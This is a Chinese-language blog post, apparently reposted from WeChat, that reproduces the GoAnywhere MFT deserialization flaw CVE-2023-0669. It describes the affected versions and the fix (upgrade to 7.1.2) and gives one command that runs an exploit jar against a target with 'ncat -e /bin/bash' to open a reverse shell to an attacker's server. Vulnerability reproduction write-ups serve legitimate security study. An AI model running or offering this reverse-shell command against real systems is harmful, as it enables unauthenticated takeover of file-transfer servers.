CVE-2023-0669 GoAnywhereMFT反序列化漏洞复现
2023-2-14 22:33:30 Author: 黑客前沿(查看原文) 阅读量:15 收藏

免责声明

文中提到的所有技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则产生的一切后果自行承担,与本文作者无关!

GoAnywhereMFT

GoAnywhereMFT是一个管理文件传输的解决方案,它简化了系统、员工、客户和贸易伙伴之间的数据交换。它通过广泛的安全设置、详细的审计跟踪提供集中控制,并帮助将文件中的信息处理为XML、EDI、CSV和JSON数据库。

CVE-2023-0669

GoAnywhereMFT管理端存在反序列化漏洞,攻击者利用该漏洞无需登录便可以远程执行任意命令。漏洞被追踪为CVE-2023-0669。

影响范围

GoAnywhereMFT小于7.1.2版本

漏洞复现

工具使用说明:

本地java版本:

使用命令反弹shell:
java -jar CVE-2023-0669.jar -p http://127.0.0.1:8080 -t http://x.x.x.x/ -c "ncat -e /bin/bash yourvps yourport"

注意:-p 代理 不可不指定,否则会报错,将流量转到burp即可

burp数据包:

工具下载地址:公众号回复 CVE-2023-0669 获取

漏洞修复

更新到7.1.2版本。

RCE

导出域用户hash姿势总结

win7DoublePulsar

文章来源: http://mp.weixin.qq.com/s?__biz=MzA3MjIxNzk4OQ==&mid=2247484680&idx=1&sn=b0728535b51797e17e943f8201a6b5dd&chksm=9f20e1e2a85768f49adf9227ba6b3dd3ef5fd0cc4479a2e4de2d8d399d35ba29694ffb3afea2#rd
如有侵权请联系:admin#unsafe.sh